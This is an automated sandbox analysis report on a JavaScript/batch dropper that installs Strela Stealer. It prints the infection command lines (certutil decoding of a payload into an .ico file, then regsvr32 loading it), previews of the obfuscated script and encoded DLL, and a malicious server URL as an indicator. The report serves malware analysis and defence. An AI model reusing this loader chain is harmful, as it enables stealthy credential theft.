C:\Users\user\childlikeclearintroduce.ico, PE32+ 15->29 dropped 31 Drops PE files to the user root directory 15->31 25 regsvr32.exe 19->25         started        signatures10 process11

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.js21%ReversingLabsScript-JS.Trojan.Cryxos
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  45.9.74.12/server.php100%Avira URL Cloudmalware
                  No contacted domains info
                  NameMaliciousAntivirus DetectionReputation
                  45.9.74.12/server.phptrue
                  • Avira URL Cloud: malware
                  low
                  No contacted IP infos
                  Joe Sandbox version:40.0.0 Tourmaline
                  Analysis ID:1417160
                  Start date and time:2024-03-28 17:39:09 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 30s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Without Instrumentation
                  Number of analysed new started processes analysed:13
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.js
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winJS@16/7@0/0
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .js
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: file.js
                  TimeTypeDescription
                  17:39:56API Interceptor1x Sleep call for process: WMIC.exe modified
                  No context
                  No context
                  No context
                  No context
                  No context
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):64
                  Entropy (8bit):0.7307872139132228
                  Encrypted:false
                  SSDEEP:3:NlllulF/lll:NllUF/ll
                  MD5:3ECB05F56210644B241FF459B861D309
                  SHA1:1A33420F5866C42A5ED3CFF0DD505451FBFA8072
                  SHA-256:712FFFDDF0CCED8E7AD767551D53F38D2682E171595701A31F73AC916F7134E0
                  SHA-512:79DC8B376BDAE7F0BA59108D89D9DA4CD6B1E7AB0280DB31A030E4C4507AB63D22D9DF6443DE18E92D64382AA97F051AC1D6FAFE07CA9281BEBD129A91EB19B8
                  Malicious:false
                  Reputation:low
                  Preview:@...e.................................^.........................
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):60
                  Entropy (8bit):4.038920595031593
                  Encrypted:false
                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                  Malicious:false
                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                  Process:C:\Windows\System32\certutil.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):217854
                  Entropy (8bit):7.137051421026175
                  Encrypted:false
                  SSDEEP:3072:GYT7l9iCrI+6+I3S79OqjdDRMgMHT3QyHN5VPTsLc5nwS0tgeAxEvS09Mb3XXz7C:GYuZlc9dBhi7sLc5n50tgruv/CjXX/UB
                  MD5:7E1529697AAC44E5A46CB7DBCA337029
                  SHA1:B53ED2A757827ABD2D020B5BD9CB860B1D02D705
                  SHA-256:BE74987F0F80B269C4F7E24D748D95011B10047FAA94713A5DD09667F2C49B58
                  SHA-512:FE240573D1378D3ADAFF5F7559F6E0832BB5F95188F61C2FD47BEA0C189CBDDD84C8060EC2D38CD547B49BF7673F832C90CE9D6644123196F98058D0FC6E4554
                  Malicious:true
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....P.f..........& ...)......................L......................................>....`... .........................................L....................................@..x...........................`...(...................X................................text..............................`..`.data...`...........................@....rdata..............................@..@/4..................................@....pdata..............................@..@.xdata..............................@..@.bss....`................................edata..L...........................@..@.idata..............................@....CRT....X.... ......................@....tls.........0......................@....reloc..x....@......................@..B/14.....P....P......................@..B/29..........`......................@..B/41..........p......................@..B/55.....
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with very long lines (3189), with CRLF line terminators
                  Category:modified
                  Size (bytes):290656
                  Entropy (8bit):5.650621834731874
                  Encrypted:false
                  SSDEEP:6144:pMJG53b6/eR6+9RtBBg6G/MsfYrxdmQuU:pM053bvRDDBBg6N/
                  MD5:E3FDA10334A83DBB755330DD3A63BC21
                  SHA1:A72086D7F20D8B37C5EC8D02FBDDDFD444497B5B
                  SHA-256:4792C6AC4CED98AD8DD453E8814C920A28922FF7A69E3E5064FE506A81A03817
                  SHA-512:D318D3820D94FFF073091EF4188D69DD7B2B6844F4AAEA920598E3A618FD4950C518C0716C4B821FA3CC2036FC76A4909FDBB2A59028348296FC33D0D2CBB8A3
                  Malicious:false
                  Preview:TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAAZIYTAMZQBWYA6AIApwQAAPAAJiALAgIpALAAAADGAgAAAgAAkhIAAAAQAAAAAEz8AgAAAAAQAAAAAgAABAAAAAAAAAAFAAIAAAAAAADAAwAABgAA4z4EAAMAYAEAACAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAADAEwAAAAAEAMAsAgAAAAAAAAAAAAAANACAKACAAAAAAAAAAAAAABAAwB4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYLACACgAAAAAAAAAAAAAAAAAAAAAAAAAWBIDAKABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAANiuAAAAEAAAALAAAAAGAAAAAAAAAAAAAAAAAABgAABgLmRhdGEAAABg7gEAAMAAAADwAQAAtgAAAAAAAAAAAAAAAAAAQAAAwC5yZGF0YQAAEAkAAACwAgAACgAAAKYCAAAAAAAAAAAAAAAAAEAAAEAvNAAAAAAAAAQAAAAAwAIAAAIAAACwAgAAAAAAAAAAAAAAAABAAADALnBkYXRhAACgAgAAANACAAAEAAAAsgIAAAAAAAAAAAAAAAAAQAAAQC54ZGF0YQAAjAIAAADgAgAABAAAALYCAAAAAAAAAAAAAAAAAEAAAEAuYnNzAAAAAGABAAAA8AIAAAAAAAAAAAAAAAAAAAAAAAAAAACAAADALmVkYXRhAABMAAAAAAADAAACAAAAugIAAAAAAAAAAAAAAAAAQAAAQC5pZGF0YQAAsAgAAAAQAwAACgAAALwCAAAAAAAAAAAAAAAAAEAA
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with very long lines (3189), with CRLF line terminators
                  Category:dropped
                  Size (bytes):321034
                  Entropy (8bit):5.79551228137475
                  Encrypted:false
                  SSDEEP:6144:4MJG53b6/eR6+9RtBBg6G/MsfYrxdmQuPrPU+7:4M053bvRDDBBg6NCPF
                  MD5:2ECFB5962169FD0CD5481A5BDFA56BBA
                  SHA1:9E97ED9944BC0442554B423009F1B4950811A4FC
                  SHA-256:B50491831CB3674FCDB34933AD61D233AC2CC275AC396D00F7257F9BC0328A97
                  SHA-512:4FF559DA10FF93D72F0207178F2DA7804AFF4A8470652630C43C106283280140329FCD14A567EC11482AA248E3F7CEB775DE762FBFF1B2C1FE368BD5BAB7FDDF
                  Malicious:true
                  Yara Hits:
                  • Rule: JoeSecurity_EXEembeddedinBATfile, Description: Yara detected EXE embedded in BAT file, Source: C:\Users\user\stiffrelievedawesome.bat, Author: Joe Security
                  Preview:/* joyousintroducebreezy..set joyousintroducebreezyadmirekindheartediron=r..set joyousintroducebreezyold-fashionedfewuse=c..set joyousintroducebreezyairportfascinatedaddicted=e..set joyousintroducebreezyphobicbalancehappy=w..set joyousintroducebreezyfeeblecoachrose=o..set joyousintroducebreezysmellylimitwax=t..set joyousintroducebreezylaboredvegetabledomineering=m..set joyousintroducebreezychallengefierceworried=a..set joyousintroducebreezydraconianbeliefgusty=u..set joyousintroducebreezyusedmasktree=d..set joyousintroducebreezybucketheapproperty=h..set joyousintroducebreezyagonizingcoldwind=b..set joyousintroducebreezydancedowntownignore=k..set joyousintroducebreezytrailfemaledrum=i..set joyousintroducebreezygreedydisturbedwarm=q..set joyousintroducebreezysofaparchedrule=p..set joyousintroducebreezyversebluegrowth=n..set joyousintroducebreezystakingsuitfeeble=x..set joyousintroducebreezyrottenqueuecoherent=l..set joyousintroducebreezymomsonghome=j..set joyousintroducebreezymakeshiftvi
                  Process:C:\Windows\System32\cmd.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:false
                  Preview:[ZoneTransfer]....ZoneId=0
                  File type:ASCII text, with very long lines (3189), with CRLF line terminators
                  Entropy (8bit):5.79551228137475
                  TrID:
                  • Java Script (8502/1) 100.00%
                  File name:file.js
                  File size:321'034 bytes
                  MD5:2ecfb5962169fd0cd5481a5bdfa56bba
                  SHA1:9e97ed9944bc0442554b423009f1b4950811a4fc
                  SHA256:b50491831cb3674fcdb34933ad61d233ac2cc275ac396d00f7257f9bc0328a97
                  SHA512:4ff559da10ff93d72f0207178f2da7804aff4a8470652630c43c106283280140329fcd14a567ec11482aa248e3f7ceb775de762fbff1b2c1fe368bd5bab7fddf
                  SSDEEP:6144:4MJG53b6/eR6+9RtBBg6G/MsfYrxdmQuPrPU+7:4M053bvRDDBBg6NCPF
                  TLSH:CC64B0B35D473EC9976D4FC4F942E6200CAC7EF72354D2A0AD98278667F80694E10DAE
                  File Content Preview:/* joyousintroducebreezy..set joyousintroducebreezyadmirekindheartediron=r..set joyousintroducebreezyold-fashionedfewuse=c..set joyousintroducebreezyairportfascinatedaddicted=e..set joyousintroducebreezyphobicbalancehappy=w..set joyousintroducebreezyfeebl
                  Icon Hash:68d69b8bb6aa9a86
                  No network behavior found

                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:17:39:55
                  Start date:28/03/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.js"
                  Imagebase:0x7ff70e8b0000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:1
                  Start time:17:39:56
                  Start date:28/03/2024
                  Path:C:\Windows\System32\cmd.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\cmd.exe" /k copy "C:\Users\user\Desktop\file.js" "C:\Users\user\\stiffrelievedawesome.bat" && "C:\Users\user\\stiffrelievedawesome.bat"
                  Imagebase:0x7ff686460000
                  File size:289'792 bytes
                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:2
                  Start time:17:39:56
                  Start date:28/03/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7699e0000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:false

                  Target ID:3
                  Start time:17:39:56
                  Start date:28/03/2024
                  Path:C:\Windows\System32\wbem\WMIC.exe
                  Wow64 process (32bit):false
                  Commandline:wmic path win32_operatingsystem get oslanguage
                  Imagebase:0x7ff662070000
                  File size:576'000 bytes
                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:4
                  Start time:17:39:56
                  Start date:28/03/2024
                  Path:C:\Windows\System32\find.exe
                  Wow64 process (32bit):false
                  Commandline:find /i "1033"
                  Imagebase:0x7ff777b90000
                  File size:17'920 bytes
                  MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:5
                  Start time:17:39:57
                  Start date:28/03/2024
                  Path:C:\Windows\System32\findstr.exe
                  Wow64 process (32bit):false
                  Commandline:findstr /V joyousintroducebreezy ""C:\Users\user\\stiffrelievedawesome.bat""
                  Imagebase:0x7ff7a05d0000
                  File size:36'352 bytes
                  MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:6
                  Start time:17:39:57
                  Start date:28/03/2024
                  Path:C:\Windows\System32\certutil.exe
                  Wow64 process (32bit):false
                  Commandline:certutil -f -decode deepdidacticfour childlikeclearintroduce.ico
                  Imagebase:0x7ff6010d0000
                  File size:1'651'712 bytes
                  MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:7
                  Start time:17:39:57
                  Start date:28/03/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:powershell regsvr32 childlikeclearintroduce.ico
                  Imagebase:0x7ff788560000
                  File size:452'608 bytes
                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:8
                  Start time:17:39:58
                  Start date:28/03/2024
                  Path:C:\Windows\System32\regsvr32.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\system32\regsvr32.exe" childlikeclearintroduce.ico
                  Imagebase:0x7ff7e9710000
                  File size:25'088 bytes
                  MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:true

                  Reset < >

                    Execution Graph

                    Execution Coverage:0.6%
                    Dynamic/Decrypted Code Coverage:15.9%
                    Signature Coverage:3.7%
                    Total number of Nodes:82
                    Total number of Limit Nodes:2
                    execution_graph 6365 7ffe102314b0 GetModuleHandleA 6366 7ffe10231513 6365->6366 6367 7ffe102314d5 LoadLibraryA GetProcAddress GetProcAddress 6365->6367 6367->6366 6368 7ffe1023b2a1 6369 7ffe1023b2b6 6368->6369 6370 7ffe1023b2c0 6368->6370 6370->6369 6371 7ffe1023b31b free 6370->6371 6371->6369 6344 2b86839 6348 2b8683e 6344->6348 6345 2b868f2 6348->6345 6349 2b86908 6348->6349 6350 2b86915 6349->6350 6351 2b86931 ExitProcess 6350->6351 6360 7ffe1023ba70 6361 7ffe1023ba8d 6360->6361 6362 7ffe1023ba9f _configure_narrow_argv __p___argc __p___argv __p__environ 6361->6362 6363 7ffe1023bae5 6362->6363 6364 7ffe1023bad8 _set_new_mode 6362->6364 6364->6363 6434 7ffe1023baf0 6435 7ffe1023bb0d 6434->6435 6436 7ffe1023bb1f _configure_wide_argv __p___argc __p___wargv __p__wenviron 6435->6436 6437 7ffe1023bb65 6436->6437 6438 7ffe1023bb58 _set_new_mode 6436->6438 6438->6437 6372 7ffe10231292 6375 7ffe102312ce 6372->6375 6376 7ffe102312fa 6375->6376 6377 7ffe102312c8 6376->6377 6388 7ffe1023b158 6376->6388 6379 7ffe10231315 6385 7ffe1023138a 6379->6385 6392 7ffe1023101d 6379->6392 6381 7ffe10231337 6381->6377 6382 7ffe10231363 6381->6382 6381->6385 6382->6377 6383 7ffe1023101d 4 API calls 6382->6383 6383->6377 6384 7ffe10231402 6384->6377 6386 7ffe1023101d 4 API calls 6384->6386 6385->6384 6387 7ffe1023101d 4 API calls 6385->6387 6386->6377 6387->6384 6389 7ffe1023b16e 6388->6389 6391 7ffe1023b1ef 6388->6391 6404 7ffe1023adce 6389->6404 6391->6379 6393 7ffe10231039 6392->6393 6394 7ffe102311d7 6393->6394 6395 7ffe10231068 6393->6395 6402 7ffe10231054 6393->6402 6401 7ffe1023bbd0 2 API calls 6394->6401 6394->6402 6396 7ffe10231109 6395->6396 6397 7ffe102310fd 6395->6397 6399 7ffe10231116 _initterm 6396->6399 6400 7ffe10231107 6396->6400 6430 7ffe1023bbd0 __acrt_iob_func 6397->6430 6399->6400 6400->6402 6403 7ffe1023114a _initterm 6400->6403 6401->6402 6402->6381 6403->6402 6405 7ffe1023ae96 6404->6405 6406 7ffe1023ae01 6404->6406 6405->6391 6407 7ffe1023ae42 6406->6407 6408 7ffe1023ae9b 6406->6408 6407->6405 6414 7ffe1023ad87 6407->6414 6412 7ffe1023aebf 6408->6412 6418 7ffe1023a960 6408->6418 6411 7ffe1023a960 __acrt_iob_func 6411->6412 6412->6405 6412->6411 6413 7ffe1023ad87 __acrt_iob_func 6412->6413 6413->6412 6415 7ffe1023ada2 6414->6415 6417 7ffe1023adae 6414->6417 6422 7ffe1023a9d0 6415->6422 6417->6407 6419 7ffe1023a98d 6418->6419 6420 7ffe1023a9aa __acrt_iob_func 6419->6420 6421 7ffe1023a9ca 6420->6421 6421->6412 6424 7ffe1023a9e8 6422->6424 6423 7ffe1023ac97 6423->6417 6424->6423 6425 7ffe1023a960 __acrt_iob_func 6424->6425 6426 7ffe1023aaa6 6424->6426 6425->6426 6427 7ffe1023a960 __acrt_iob_func 6426->6427 6428 7ffe1023aba3 6426->6428 6427->6428 6428->6423 6429 7ffe1023a960 __acrt_iob_func 6428->6429 6429->6423 6433 7ffe1023bdd0 __stdio_common_vfprintf 6430->6433 6432 7ffe1023bbfd 6432->6400 6433->6432 6352 2b81d20 6356 2b81ee4 6352->6356 6354 2b81d34 __scrt_get_show_window_mode __scrt_acquire_startup_lock __scrt_release_startup_lock 6354->6352 6355 2b81d7f 6354->6355 6357 2b81eec 6356->6357 6358 2b81ef8 __scrt_dllmain_crt_thread_attach 6357->6358 6359 2b81f01 6358->6359 6359->6354

                    Control-flow Graph

                    APIs
                    • ExitProcess.KERNEL32(?,?,?,?,?,?,?,02B86904), ref: 02B86933
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExitProcess
                    • String ID:
                    • API String ID: 621844428-0
                    • Opcode ID: 6f2daaeeca48df6809e1ef62a5907e3c123bc7a7416cb568dceb1a8a4d26e80d
                    • Instruction ID: bb1bd184a73e062827b8d35a5ab3b1c87a76bb168c53463f75000f67aa01f2eb
                    • Opcode Fuzzy Hash: 6f2daaeeca48df6809e1ef62a5907e3c123bc7a7416cb568dceb1a8a4d26e80d
                    • Instruction Fuzzy Hash: DCD05E203003084FEB1C7BB09A88229275ACB89205F00187C561BCB6D2DD38D804C702
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true
                    • Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$HandleLibraryLoadModule
                    • String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
                    • API String ID: 384173800-1835852900
                    • Opcode ID: eac4c94454c1683f2d1643de50e5298fc4e81923689dd3558cc9618993412369
                    • Instruction ID: 6244525d03add14c1aff11abf6b0fedf68933ef7e5f44f2a8bf370e0af9f5ecc
                    • Opcode Fuzzy Hash: eac4c94454c1683f2d1643de50e5298fc4e81923689dd3558cc9618993412369
                    • Instruction Fuzzy Hash: C2010961E09E1B98EA159B07B8101B52B64BFC87B4BA801B1CE1D573B6FF2CE50AC304
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID: _clrfp
                    • String ID:
                    • API String ID: 3618594692-0
                    • Opcode ID: bf11b2a348dd1cebbe3407e039c1e158691c8c076b119f432e33d7f46d24fa38
                    • Instruction ID: 9f70995267c3afe60f3f06e28a59a1714ca2092007e4e8e1dcc4126be755abe4
                    • Opcode Fuzzy Hash: bf11b2a348dd1cebbe3407e039c1e158691c8c076b119f432e33d7f46d24fa38
                    • Instruction Fuzzy Hash: 5AB17931520A4D8FDB99EF1CC88AB6677E0FF59308F588599E85DCB262C335D892CB01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c5a872e6d0ce145e63e4b493c0a28ebaad772e9be0e78487281bcf853c86d47e
                    • Instruction ID: 34edad2a8ef5c2d7471891838fa393843d97e2a2b412097c351579ae7a275491
                    • Opcode Fuzzy Hash: c5a872e6d0ce145e63e4b493c0a28ebaad772e9be0e78487281bcf853c86d47e
                    • Instruction Fuzzy Hash: 83E15E70528B488FDB75EF18DC95AEAB7E1FB94304F40466EE48EC3520DB749641CB82
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 15cc186248de5ca8b7905a83fea9e7948ffbd5913fd68f4cba90bb8ca2c85fa2
                    • Instruction ID: 77253702432b3694a47a97f60c756bdf6eb56b79fc061d001e423ec9fac10725
                    • Opcode Fuzzy Hash: 15cc186248de5ca8b7905a83fea9e7948ffbd5913fd68f4cba90bb8ca2c85fa2
                    • Instruction Fuzzy Hash: 74B15D31218A498FDB29EF28DC986FA73E1FB94305F54426AD45FC3590EF349A06CB81
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7755fe846fb63fdab89a2c0b004d9a83724ebd39b55f4d955bef4c225e210f78
                    • Instruction ID: 49897fa3cb8b58d9d419a7afcfd5dbccbfba96703ba9c47dbf7cc40e01375ca8
                    • Opcode Fuzzy Hash: 7755fe846fb63fdab89a2c0b004d9a83724ebd39b55f4d955bef4c225e210f78
                    • Instruction Fuzzy Hash: DA51F232318E0C8F8B1CEF6CD89867573D2E7AC314315826EE40ED72A5DA70E8468785
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 31 2b83a50-2b83ab7 call 2b849f4 34 2b83f18-2b83f1f call 2b871f4 31->34 35 2b83abd-2b83ac0 31->35 35->34 36 2b83ac6-2b83acc 35->36 38 2b83b9b-2b83bad 36->38 39 2b83ad2-2b83ad6 36->39 41 2b83e68-2b83e6c 38->41 42 2b83bb3-2b83bb7 38->42 39->38 43 2b83adc-2b83ae7 39->43 44 2b83e6e-2b83e75 41->44 45 2b83ea5-2b83eaf call 2b82b3c 41->45 42->41 46 2b83bbd-2b83bc8 42->46 43->38 47 2b83aed-2b83af2 43->47 44->34 49 2b83e7b-2b83ea0 call 2b83f20 44->49 45->34 59 2b83eb1-2b83ed0 call 2b8f420 45->59 46->41 51 2b83bce-2b83bd5 46->51 47->38 48 2b83af8-2b83b02 call 2b82b3c 47->48 48->59 62 2b83b08-2b83b33 call 2b82b3c * 2 call 2b83504 48->62 49->45 52 2b83d99-2b83da5 51->52 53 2b83bdb-2b83c16 call 2b831fc 51->53 52->45 60 2b83dab-2b83daf 52->60 53->52 67 2b83c1c-2b83c26 53->67 64 2b83dbf-2b83dc7 60->64 65 2b83db1-2b83dbd call 2b834c4 60->65 100 2b83b53-2b83b5d call 2b82b3c 62->100 101 2b83b35-2b83b39 62->101 64->45 66 2b83dcd-2b83dda call 2b8309c 64->66 65->64 79 2b83de0-2b83de8 65->79 66->45 66->79 72 2b83c2a-2b83c5c 67->72 76 2b83d88-2b83d8f 72->76 77 2b83c62-2b83c6e 72->77 76->72 84 2b83d95-2b83d96 76->84 77->76 82 2b83c74-2b83c8d 77->82 80 2b83efb-2b83f17 call 2b82b3c * 2 call 2b87168 79->80 81 2b83dee-2b83df2 79->81 80->34 85 2b83df4-2b83e03 call 2b834c4 81->85 86 2b83e05-2b83e06 81->86 88 2b83c93-2b83cd8 call 2b834d8 * 2 82->88 89 2b83d85-2b83d86 82->89 